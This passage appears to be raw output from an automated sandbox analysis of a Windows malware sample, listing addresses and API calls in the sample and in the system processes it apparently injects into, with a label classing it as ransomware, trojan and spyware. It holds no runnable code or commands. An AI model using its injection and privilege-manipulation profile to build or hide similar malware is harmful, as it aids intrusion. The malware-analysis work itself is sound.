Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42F60 NtCreateProcessEx,	4_2_02B42F60
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42CF0 NtOpenProcess,	4_2_02B42CF0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42CC0 NtQueryVirtualMemory,	4_2_02B42CC0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42C00 NtQueryInformationProcess,	4_2_02B42C00
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42DB0 NtEnumerateKey,	4_2_02B42DB0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42D00 NtSetInformationFile,	4_2_02B42D00
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B43090 NtSetValueKey,	4_2_02B43090
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B43010 NtOpenDirectoryObject,	4_2_02B43010
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B43D10 NtOpenProcessToken,	4_2_02B43D10
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B43D70 NtOpenThread,	4_2_02B43D70
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02429240 NtReadFile,	4_2_02429240
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02429330 NtDeleteFile,	4_2_02429330
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_024293D0 NtClose,	4_2_024293D0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_024290D0 NtCreateFile,	4_2_024290D0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02429530 NtAllocateVirtualMemory,	4_2_02429530

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004CD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_004CD5EB

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004C1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_004C1201

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004CE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004CE8F6

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0046BF40	0_2_0046BF40
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D2046	0_2_004D2046
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00468060	0_2_00468060
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004C8298	0_2_004C8298
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0049E4FF	0_2_0049E4FF
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0049676B	0_2_0049676B
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004F4873	0_2_004F4873
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0046CAF0	0_2_0046CAF0
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0048CAA0	0_2_0048CAA0
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0047CC39	0_2_0047CC39
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00496DD9	0_2_00496DD9
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0047B119	0_2_0047B119
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004691C0	0_2_004691C0
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00481394	0_2_00481394
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00481706	0_2_00481706
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0048781B	0_2_0048781B
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0047997D	0_2_0047997D
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00467920	0_2_00467920
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004819B0	0_2_004819B0
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00487A4A	0_2_00487A4A
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00481C77	0_2_00481C77
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00487CA7	0_2_00487CA7
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004EBE44	0_2_004EBE44
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00499EEE	0_2_00499EEE
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00481F32	0_2_00481F32
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_01027718	0_2_01027718
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418743	2_2_00418743
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410143	2_2_00410143
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041694E	2_2_0041694E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416953	2_2_00416953
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E133	2_2_0040E133
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403250	2_2_00403250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E27F	2_2_0040E27F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E283	2_2_0040E283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004024E0	2_2_004024E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EEA3	2_2_0042EEA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040277A	2_2_0040277A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF1A	2_2_0040FF1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF23	2_2_0040FF23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402780	2_2_00402780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033003E6	2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C02C0	2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230100	2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033001AA	2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81CC	2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264750	2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C6E0	2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03300591	2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4420	2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F2446	2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE4F6	2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6BD7	2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A9A6	2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A840	2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032268B8	2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E8F0	2_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282F28	2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260F30	2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E2F30	2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4F40	2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEFA0	2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CFE0	2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232FC8	2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEE26	2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240E59	2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252E90	2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCE93	2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEEDB	2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AD00	2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DCD1F	2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258DBF	2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323ADE0	2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240C00	2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0CB5	2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230CF2	2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F132D	2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D34C	2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328739A	2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032452A0	2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E12ED	2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B2C0	2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327516C	2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F172	2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B16B	2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B1B0	2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70E9	2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF0E0	2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF0CC	2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032470C0	2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF7B0	2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032317EC	2_2_032317EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F16CC	2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7571	2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD5B0	2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF43F	2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231460	2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB76	2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FB80	2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5BF0	2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DBF9	2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B3A6C	2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA49	2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7A46	2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DDAAC	2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285AA0	2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E1AA3	2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EDAC6	2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D5910	2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249950	2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B950	2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD800	2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032438E0	2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF09	2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFFB1	2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241F92	2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249EB0	2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D73	2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243D40	2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1D5A	2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FDC0	2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9C32	2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFCF2	2_2_032FFCF2
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B902C0	4_2_02B902C0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BB0274	4_2_02BB0274
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B1E3F0	4_2_02B1E3F0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BD03E6	4_2_02BD03E6
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCA352	4_2_02BCA352
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BA2000	4_2_02BA2000
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BD01AA	4_2_02BD01AA
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC41A2	4_2_02BC41A2
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC81CC	4_2_02BC81CC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BAA118	4_2_02BAA118
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B00100	4_2_02B00100
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B98158	4_2_02B98158
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B2C6E0	4_2_02B2C6E0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B0C7C0	4_2_02B0C7C0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B10770	4_2_02B10770
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B34750	4_2_02B34750
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BBE4F6	4_2_02BBE4F6
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BB4420	4_2_02BB4420
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC2446	4_2_02BC2446
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BD0591	4_2_02BD0591
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B10535	4_2_02B10535
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B0EA80	4_2_02B0EA80
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC6BD7	4_2_02BC6BD7
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCAB40	4_2_02BCAB40
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02AF68B8	4_2_02AF68B8
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B3E8F0	4_2_02B3E8F0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B1A840	4_2_02B1A840
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B12840	4_2_02B12840
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B129A0	4_2_02B129A0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BDA9A6	4_2_02BDA9A6
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B26962	4_2_02B26962
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B22E90	4_2_02B22E90
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCCE93	4_2_02BCCE93
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCEEDB	4_2_02BCEEDB
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCEE26	4_2_02BCEE26
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B10E59	4_2_02B10E59
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B8EFA0	4_2_02B8EFA0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B1CFE0	4_2_02B1CFE0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B02FC8	4_2_02B02FC8
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B30F30	4_2_02B30F30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BB2F30	4_2_02BB2F30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B52F28	4_2_02B52F28
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B84F40	4_2_02B84F40
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BB0CB5	4_2_02BB0CB5
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B00CF2	4_2_02B00CF2
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B10C00	4_2_02B10C00
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B28DBF	4_2_02B28DBF
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B0ADE0	4_2_02B0ADE0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BACD1F	4_2_02BACD1F
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B1AD00	4_2_02B1AD00
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B152A0	4_2_02B152A0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BB12ED	4_2_02BB12ED
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B2B2C0	4_2_02B2B2C0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B5739A	4_2_02B5739A
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC132D	4_2_02BC132D
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02AFD34C	4_2_02AFD34C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC70E9	4_2_02BC70E9
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCF0E0	4_2_02BCF0E0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B170C0	4_2_02B170C0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BBF0CC	4_2_02BBF0CC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B1B1B0	4_2_02B1B1B0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BDB16B	4_2_02BDB16B
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B4516C	4_2_02B4516C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02AFF172	4_2_02AFF172
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC16CC	4_2_02BC16CC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCF7B0	4_2_02BCF7B0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B017EC	4_2_02B017EC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCF43F	4_2_02BCF43F
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B01460	4_2_02B01460
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BAD5B0	4_2_02BAD5B0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC7571	4_2_02BC7571
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B55AA0	4_2_02B55AA0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BADAAC	4_2_02BADAAC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BB1AA3	4_2_02BB1AA3
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BBDAC6	4_2_02BBDAC6
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B83A6C	4_2_02B83A6C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCFA49	4_2_02BCFA49
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC7A46	4_2_02BC7A46
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B2FB80	4_2_02B2FB80
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B85BF0	4_2_02B85BF0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B4DBF9	4_2_02B4DBF9
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCFB76	4_2_02BCFB76
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B138E0	4_2_02B138E0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B7D800	4_2_02B7D800
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BA5910	4_2_02BA5910
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B19950	4_2_02B19950
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B2B950	4_2_02B2B950
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B19EB0	4_2_02B19EB0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCFFB1	4_2_02BCFFB1
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B11F92	4_2_02B11F92
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCFF09	4_2_02BCFF09
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BCFCF2	4_2_02BCFCF2
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B89C32	4_2_02B89C32
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B2FDC0	4_2_02B2FDC0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC7D73	4_2_02BC7D73
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02BC1D5A	4_2_02BC1D5A
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B13D40	4_2_02B13D40
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02411BC0	4_2_02411BC0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240CA27	4_2_0240CA27
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240CA30	4_2_0240CA30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240AC40	4_2_0240AC40
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240CC50	4_2_0240CC50
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240AD8C	4_2_0240AD8C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240AD90	4_2_0240AD90
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02415250	4_2_02415250
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0241345B	4_2_0241345B
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02413460	4_2_02413460
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0242B9B0	4_2_0242B9B0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CE3A4	4_2_029CE3A4
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CE7BC	4_2_029CE7BC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CE77D	4_2_029CE77D
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CE4C5	4_2_029CE4C5
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029D541C	4_2_029D541C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CCBB3	4_2_029CCBB3
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CD928	4_2_029CD928

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 283 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: String function: 02B7EA12 appears 86 times
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: String function: 02AFB970 appears 283 times
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: String function: 02B45130 appears 58 times
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: String function: 02B8F290 appears 105 times
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: String function: 02B57E54 appears 100 times
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: String function: 00469CB3 appears 31 times
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: String function: 0047F9F2 appears 40 times
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: String function: 00480A30 appears 46 times

Source: KcSzB2IpP5.exe, 00000000.00000003.1332344037.0000000003C1D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs KcSzB2IpP5.exe
Source: KcSzB2IpP5.exe, 00000000.00000003.1330212323.0000000003A73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs KcSzB2IpP5.exe

Source: KcSzB2IpP5.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@7/3@15/10

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004D37B5 GetLastError,FormatMessageW,

0_2_004D37B5

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004C10BF AdjustTokenPrivileges,CloseHandle,		0_2_004C10BF
